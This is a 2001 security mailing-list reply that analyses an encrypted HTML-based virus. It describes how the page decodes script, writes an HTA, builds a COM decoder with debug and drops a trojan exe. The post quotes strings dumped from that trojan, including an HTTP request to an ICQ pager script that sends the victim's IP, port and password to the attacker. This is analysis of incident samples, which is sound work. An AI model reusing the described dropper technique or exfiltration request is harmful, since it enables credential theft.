Security Incidents mailing list archives
Re: encrypted html based virus
From: Dzzie Z <dzzie () YAHOO COM>
Date: Thu, 18 Jan 2001 20:15:31 -0500
hats off to whoever made this originally :) it is a pretty neat flow of events here....the whole thing is a master piece... webpage decodes actual malicious commands, refreshs browser to run pages new content browser executes new code and writes hta on reboot(?) hta goes into effect..(unless somehow that long non ascii string overflows a buffer..there was a package named godmessage a while back that worked like this on acouple activx controls...humm wonder) -the classID in the decoded page maps to: "Object for constructing type libraries for scriptlets" inprocserver= C:\WINDOWS\SYSTEM\SCROBJ.DLL ( anyone know anythign more about this dll? ) so the hta first writes xxdecode.src which looks like assembler commands runs it though debug to turn it into machinecode (xxdecode.com) writes an encoded file and decodes it with its own com decoder to create a live exe... I am amazed they could squeeze all that functionality into a html scripting exploit...i wonder why they didnt just disassemble the exe they were after and run that through debug? does uuencode compress? bet this probably comes from a wrapped hack program...probably from TLsecurity thinking back to the title in the decoded web page...going to have to root around and see if I can find it the exe looks like a trojan...contacts someone through there icq pager q.com.GET./scrip ts/WWPMsg.dll?fr om=Asylum&fromem ail=Asylum&subje ct=%s&body=hey+t here,+ive+been+c ommitted...+[nam e=%s]_[hostname= %s]_[ip=%s]_[por t=%s]_[password= %s]_[version=0.1 .3]_[winver=%s]& to=%s.HTTP/1.0.. .....abcdefghijk lmnopqr.36063200 ...%s\%s.winpcf3 2.exe.%s\system. ini.%s\win.ini.e xplorer.exe.%s.b wish I had a junk drive to run it on so I could grab the packets :) thanks for sharing :) techniques like this just expand thought sooo much...I cant imagine how long it took to develop this...the debug trick is beautiful...the only other place I have seen that is in an old school bat file --> com maker.... when I went to check the base href in the original file...it gave me a crash page...lots of con\con and nul\nul imgs and other scripting tricks... but I looked into the server and they are a free web host with cgi scripting...so probably just a rouge user name "theproxyjudge" over a comprimised system. if this was a overflow of an old activex control buffer it is likly to have been pre IE5(?) so they might have given me a page to fit to my browser version...
Current thread:
- Re: encrypted html based virus Dzzie Z (Jan 18)